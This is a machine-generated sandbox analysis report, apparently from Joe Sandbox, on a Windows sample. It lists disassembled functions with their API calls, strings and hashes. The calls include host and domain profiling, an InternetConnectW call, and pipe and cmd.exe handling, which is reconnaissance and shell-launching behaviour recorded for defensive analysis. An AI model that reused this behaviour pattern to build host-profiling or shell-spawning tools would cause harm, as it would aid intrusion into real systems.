                                          • Opcode Fuzzy Hash: da3cc63f17920118d24c2b820336c42d387366b536cc2b8b3f947eb32bb2bf8c
                                          • Instruction Fuzzy Hash: 1E71E272A00209BFDF20DFB4DC41AAEBBB9EF59354F244129F915A7251E7319E05CB60

                                          Control-flow Graph

                                          control_flow_graph: rendered graph of the function at 00A78AA3 (serialized node and edge data omitted)
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID: 0-3907804496
                                          • Opcode ID: 12e74b54a85a2236c5f48cfd6ce094b04a4573e9efd1c0000737dbc50dc6fdf7
                                          • Instruction ID: 91ac60694011fb5d244e73af2993214c89321c6f2e5efd0bc3ef090a8e3532c9
                                          • Opcode Fuzzy Hash: 12e74b54a85a2236c5f48cfd6ce094b04a4573e9efd1c0000737dbc50dc6fdf7
                                          • Instruction Fuzzy Hash: 30C10571E442499FDF21DFA8CD49BAEBBB0AF19310F18C195E459A7393CB388941CB61

                                          Control-flow Graph

                                          control_flow_graph: rendered graph of the function at 00A80690 (serialized node and edge data omitted; the file and handle calls it reaches are listed under APIs below)
                                          APIs
                                            • Part of subcall function 00A8035E: CreateFileW.KERNEL32(00000000,00000000,?,00A80739,?,?,00000000,?,00A80739,00000000,0000000C), ref: 00A8037B
                                          • GetLastError.KERNEL32 ref: 00A807A4
                                          • __dosmaperr.LIBCMT ref: 00A807AB
                                          • GetFileType.KERNEL32(00000000), ref: 00A807B7
                                          • GetLastError.KERNEL32 ref: 00A807C1
                                          • __dosmaperr.LIBCMT ref: 00A807CA
                                          • CloseHandle.KERNEL32(00000000), ref: 00A807EA
                                          • CloseHandle.KERNEL32(?), ref: 00A80934
                                          • GetLastError.KERNEL32 ref: 00A80966
                                          • __dosmaperr.LIBCMT ref: 00A8096D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                          • String ID: H
                                          • API String ID: 4237864984-2852464175
                                          • Opcode ID: c3dc3a38223cc8ab1b804b26e9630d0ec2a1844c0b3225a68027d55739e6c957
                                          • Instruction ID: 32b115f46e63fa2c9c2c840aab6249b268113327186d379e4e7ecc1609dc1c37
                                          • Opcode Fuzzy Hash: c3dc3a38223cc8ab1b804b26e9630d0ec2a1844c0b3225a68027d55739e6c957
                                          • Instruction Fuzzy Hash: EEA14632A041058FDF19EFB8C852BAE7BB0EB06324F14015AF815DB3A1DB359D5ACB91

                                          Control-flow Graph: function at 00A776C2 (calls _strrchr, _free; rendered graph with executed/not-executed block legend not reproduced)
                                          APIs
                                          • _strrchr.LIBCMT ref: 00A77706
                                          • _strrchr.LIBCMT ref: 00A77711
                                          • _strrchr.LIBCMT ref: 00A77738
                                          • _free.LIBCMT ref: 00A7776B
                                            • Part of subcall function 00A6514F: IsProcessorFeaturePresent.KERNEL32(00000017,00A65121,?,?,009B1F07,?,?,00000016,?,?,00A6512E,00000000,00000000,00000000,00000000,00000000), ref: 00A65151
                                            • Part of subcall function 00A6514F: GetCurrentProcess.KERNEL32(C0000417,?,?,?), ref: 00A65173
                                            • Part of subcall function 00A6514F: TerminateProcess.KERNEL32(00000000), ref: 00A6517A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: _strrchr$Process$CurrentFeaturePresentProcessorTerminate_free
                                          • String ID: .com
                                          • API String ID: 1283974128-4200470757
                                          • Opcode ID: c730ec99e7b3410e95085f87dfe4ea39f652f94a34bf36e50eac62a8e5f85e5c
                                          • Instruction ID: e1ca495d431d62af0729dfd46849fc2b45c30a0f1f9db1ed304110bc886589af
                                          • Opcode Fuzzy Hash: c730ec99e7b3410e95085f87dfe4ea39f652f94a34bf36e50eac62a8e5f85e5c
                                          • Instruction Fuzzy Hash: 4E51F636A08605AFEF25AB74DD45A7E3BB8EF45360F20C169F818D7281EB318E50D761

                                          Control-flow Graph: function at 009C38C0 (calls GetComputerNameExW, DsRoleGetPrimaryDomainInformation; rendered graph with executed/not-executed block legend not reproduced)
                                          APIs
                                          • GetComputerNameExW.KERNEL32(00000000,?,?,21472377,?), ref: 009C3941
                                          • DsRoleGetPrimaryDomainInformation.NETAPI32(00000000,00000001,?,?,00000000,?,?,?), ref: 009C39E0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ComputerDomainInformationNamePrimaryRole
                                          • String ID: Empty$_D:$w#G!
                                          • API String ID: 1590873629-1893610252
                                          • Opcode ID: 0f7ad70c166cd478548cbb53c172f7bf4b1354662196945eb2e1a7bb2f167df3
                                          • Instruction ID: 1f660dac41564bf12507b1383fd58fdbc9aa63670d591a81506c86c141845504
                                          • Opcode Fuzzy Hash: 0f7ad70c166cd478548cbb53c172f7bf4b1354662196945eb2e1a7bb2f167df3
                                          • Instruction Fuzzy Hash: 2FF19D719102598BEB28DB24CD85BAEB7B6BB84300F14C6DCD089A7291DF759BC4CF91
                                          APIs
                                          • GetLastError.KERNEL32(21472377,?,00000000,?), ref: 00A3CA77
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00A3CB5B
                                          • GetFileAttributesW.KERNEL32(?,21472377,?,?,?,?,?,?,?,00A8FCD0,000000FF,?,009B4A32), ref: 00A3CBB2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: AttributesErrorException@8FileLastThrow
                                          • String ID: boost::filesystem::status$w#G!
                                          • API String ID: 1873943377-55005676
                                          • Opcode ID: fef1d7d7defea995ffd9353b4bbadb978cb0158058aafcb2d081f5a35371f9c6
                                          • Instruction ID: a9c345b6c016aa77496e9b6e902718c094f4ec51f4f9a4f209a37af2a01ed355
                                          • Opcode Fuzzy Hash: fef1d7d7defea995ffd9353b4bbadb978cb0158058aafcb2d081f5a35371f9c6
                                          • Instruction Fuzzy Hash: 1D417372E00219ABCB10DFA8DC85BAEF7B9FB49764F14462AF815A7240D774AD04CB91
                                          APIs
                                          • GetFileAttributesW.KERNEL32(?,21472377,?,?,?,?,?,?,?,00A8FCD0,000000FF,?,009B4A32), ref: 00A3CBB2
                                          • CreateFileW.KERNEL32(?,00000000,00000007,00000000,00000003,02000000,00000000,?,?,?,?,?,?,?,?,00A8FCD0), ref: 00A3CC4D
                                            • Part of subcall function 00A3C860: CreateFileW.KERNEL32(00A3CC7E,00000008,00000007,00000000,00000003,02200000,00000000,21472377,?,00000000,?,00A3CC7E,?), ref: 00A3C8A3
                                            • Part of subcall function 00A3C860: CloseHandle.KERNEL32(00000000), ref: 00A3C924
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00A8FCD0), ref: 00A3CC99
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00A8FCD0), ref: 00A3CCA9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: CloseFileHandle$Create$Attributes
                                          • String ID: w#G!
                                          • API String ID: 2696689969-519468572
                                          • Opcode ID: e949132df1238f2669eafcc97ccc55558c19380786330060203133be7f1d2f1a
                                          • Instruction ID: a31ccb3b869ff3606235edec0bc006620c0858fa85f8eac2bf9f9362b5c14ca4
                                          • Opcode Fuzzy Hash: e949132df1238f2669eafcc97ccc55558c19380786330060203133be7f1d2f1a
                                          • Instruction Fuzzy Hash: 95515E75E00218AFDB04DFA8DD45BAEBBB4EB48724F144129F919B7381D7709904CBA1
                                          APIs
                                          • CreatePipe.KERNEL32(?,?,0000000C,?,?,?,?,?,?,?,?,00ACCF60,00000028,00A6478F,?,00000400), ref: 00A76F65
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,00ACCF60,00000028,00A6478F,?,00000400,00000080,00ACCB60,00000028), ref: 00A76F6F
                                          • __dosmaperr.LIBCMT ref: 00A76F76
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00ACCF60,00000028,00A6478F,?,00000400,00000080,00ACCB60,00000028), ref: 00A76FA1
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00ACCF60,00000028,00A6478F,?,00000400,00000080,00ACCB60,00000028), ref: 00A76FAA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: CloseHandle$CreateErrorLastPipe__dosmaperr
                                          • String ID:
                                          • API String ID: 155357802-0
                                          • Opcode ID: ead411fe247ab6a34aac30e115b8a7e87c4e4ac1d84b2b7e5792f4773d667752
                                          • Instruction ID: 18022510c9fc468d6b0cfd6339acce0413e2d3375e69897e19ec25bd3ebf7530
                                          • Opcode Fuzzy Hash: ead411fe247ab6a34aac30e115b8a7e87c4e4ac1d84b2b7e5792f4773d667752
                                          • Instruction Fuzzy Hash: 5671F472A116028BDB10EFB8DD45A9E77B5AF45324F18C21AF059CF2A2DB35D802CB50
                                          APIs
                                          • WaitForSingleObject.KERNEL32(00000010,00000000,00000000,00000000,00000000,?,?,00A64D8C,00000000,00000000,00000001,?,00ACCB40,00000010,009B88E3,00000000), ref: 00A76C75
                                          • GetExitCodeProcess.KERNEL32(00000010,00000000), ref: 00A76C84
                                          • GetLastError.KERNEL32(?,?,00A64D8C,00000000,00000000,00000001,?,00ACCB40,00000010,009B88E3,00000000), ref: 00A76C9B
                                          • __dosmaperr.LIBCMT ref: 00A76CBF
                                          • CloseHandle.KERNEL32(00000010,?,?,00A64D8C,00000000,00000000,00000001,?,00ACCB40,00000010,009B88E3,00000000), ref: 00A76CD2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: CloseCodeErrorExitHandleLastObjectProcessSingleWait__dosmaperr
                                          • String ID:
                                          • API String ID: 2013101682-0
                                          • Opcode ID: 654a6ceba539fa65a8c3f5b465c5144003ccee1e47e04421b17677a0a79d4e4b
                                          • Instruction ID: 977e43dd1828a20b75dd5b0c762779cf7566fc7d876a540bf10da895cadf2049
                                          • Opcode Fuzzy Hash: 654a6ceba539fa65a8c3f5b465c5144003ccee1e47e04421b17677a0a79d4e4b
                                          • Instruction Fuzzy Hash: 1811C673600E10ABDB126FA98D8476AB778EF85320F25C215F89D87250DB319D018BA1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: w#G!
                                          • API String ID: 0-519468572
                                          • Opcode ID: 3f0949354296d1e42cb10deb7007c89e5765544181acba63c65440506d861675
                                          • Instruction ID: 9188549b1b489282323015165715824bd07d8219559114b8c8b6a9b1d2ff6c53
                                          • Opcode Fuzzy Hash: 3f0949354296d1e42cb10deb7007c89e5765544181acba63c65440506d861675
                                          • Instruction Fuzzy Hash: BF51CE72E00A0ADBDB14DFB4CD45FAF7BB8EF05320F54C519E418A7292D6B09901DBA1
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: _free
                                          • String ID: COMSPEC$cmd.exe$w#G!
                                          • API String ID: 269201875-4135058600
                                          • Opcode ID: 314ebfbe196aa91eff68533e9863cb93202605cb322ec4add30f0a3b6f4fc30c
                                          • Instruction ID: 4f68ce3261bbafe4f51c62e6c91287a2a5d92ce28a4e1920a6378db32133c0d7
                                          • Opcode Fuzzy Hash: 314ebfbe196aa91eff68533e9863cb93202605cb322ec4add30f0a3b6f4fc30c
                                          • Instruction Fuzzy Hash: 5E31A9B1D015159B9B21EFB4CE419AFBBB8EF42361F150266F915A7251D6304E01CBE1
                                          APIs
                                          • InternetConnectW.WININET(?,?,00000050,00000000,00000000,00000003,00000000,00000000), ref: 009C63F4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ConnectInternet
                                          • String ID: 0.0.0.1$`
                                          • API String ID: 3050416762-3652615328
                                          • Opcode ID: ea6a6c8d9341d0c5bb6ef5de287157b6cf51df9d1219499102950eac465790cd
                                          • Instruction ID: 2965bfac7bc66546f44bf2c6197aa7960a0adb6a5c71f7540d5b872a4de8d78c
                                          • Opcode Fuzzy Hash: ea6a6c8d9341d0c5bb6ef5de287157b6cf51df9d1219499102950eac465790cd
                                          • Instruction Fuzzy Hash: E851C070A101699BDF18DF24CD85F9DB7B6AF84304F90819DF509A7292C738AA84CF59
                                          APIs
                                          • WriteFile.KERNEL32(7408458B,?,?,?,00000000,?,00A6AB2E,E0830C40,?,00A7577F,00A28F76,00A6AB2E,?,00A6AB2E,00A6AB2E,00A28F76), ref: 00A752DE
                                          • GetLastError.KERNEL32(?,00A7577F,00A28F76,00A6AB2E,?,00A6AB2E,00A6AB2E,00A28F76,00A6AB2E,?,00ACCEE0,00000014,00A61B64,00000000,8304488B,00A28F76), ref: 00A75307
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: ErrorFileLastWrite
                                          • String ID: w#G!
                                          • API String ID: 442123175-519468572
                                          • Opcode ID: b0c8a5a5eb1092f6e336109c75dce6b1814db48f26df945c9494d1448ac86fb2
                                          • Instruction ID: 5112172178741113c5319a6c7e5310632ea2b224ce357bcbad6d3de0a65c9f64
                                          • Opcode Fuzzy Hash: b0c8a5a5eb1092f6e336109c75dce6b1814db48f26df945c9494d1448ac86fb2
                                          • Instruction Fuzzy Hash: DB21A835A007199FCB14CF69CD80AE9B3F5EB48341F1084AAE54AD7251D770AD86CF50
                                          APIs
                                          • GlobalMemoryStatusEx.KERNEL32(?,00000000), ref: 009C444D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: GlobalMemoryStatus
                                          • String ID: @$w#G!
                                          • API String ID: 1890195054-3043592971
                                          • Opcode ID: d429d5e6812142c498938d6e7d4b4fa984530b853f9e79be1cb7a82da9cd337c
                                          • Instruction ID: 94a101a35e44cc7f3b61a1630a6989032234d1e32447769736d7ee204204ac08
                                          • Opcode Fuzzy Hash: d429d5e6812142c498938d6e7d4b4fa984530b853f9e79be1cb7a82da9cd337c
                                          • Instruction Fuzzy Hash: 7121F071A14B449BC260EF38DD42B1BB7F5AF9AB40F000B1EF48597241EB70A8548BC2
                                          APIs
                                          • NetApiBufferFree.NETAPI32(00000000), ref: 009C4606
                                          • NetApiBufferFree.NETAPI32(00000000), ref: 009C4622
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: BufferFree
                                          • String ID: Default
                                          • API String ID: 710964542-753088835
                                          • Opcode ID: 33a0a89e32f339c36d84a8b93b88dbd3d83b1a396c349fe96d8777ea6f90bb1f
                                          • Instruction ID: 3885e42d10b027170be974ddf0f73574cde7dbdb53e65fbf261787a3df6846d8
                                          • Opcode Fuzzy Hash: 33a0a89e32f339c36d84a8b93b88dbd3d83b1a396c349fe96d8777ea6f90bb1f
                                          • Instruction Fuzzy Hash: B8F04F35F052099BDB28DF98D5A1BADB7B5EB49321F10426FD81663680CB35A9008A91
                                          APIs
                                          • CloseHandle.KERNEL32(00000000,00000000,00A28F4C,?,00A7587B,00A28F4C,00ACCF00,0000000C), ref: 00A759B3
                                          • GetLastError.KERNEL32(?,00A7587B,00A28F4C,00ACCF00,0000000C), ref: 00A759BD
                                          • __dosmaperr.LIBCMT ref: 00A759E8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: CloseErrorHandleLast__dosmaperr
                                          • String ID:
                                          • API String ID: 2583163307-0
                                          • Opcode ID: d5a40f54f5681c4978403519145939db09390aede1be560ba3574a22a6aa6162
                                          • Instruction ID: aaeb9b4abed493412da24f0be0579aa14963872d391aa0f5dd989c9e290821fd
                                          • Opcode Fuzzy Hash: d5a40f54f5681c4978403519145939db09390aede1be560ba3574a22a6aa6162
                                          • Instruction Fuzzy Hash: D4016D33E049109AD62453B4AD8577F67598B82734F29CA1EFA1C8B1D2EEA0CD82C154
                                          APIs
                                          • SetFilePointerEx.KERNEL32(00000000,00000000,00A28F76,00000000,00000002,00A28F76,00000000,?,?,?,00A7900C,00000000,00000000,00A28F76,00000002), ref: 00A78F96
                                          • GetLastError.KERNEL32(?,00A7900C,00000000,00000000,00A28F76,00000002,?,00A6AA52,?,00000000,00000000,00000001,?,00A28F76,?,00A6AB07), ref: 00A78FA0
                                          • __dosmaperr.LIBCMT ref: 00A78FA7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                           • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
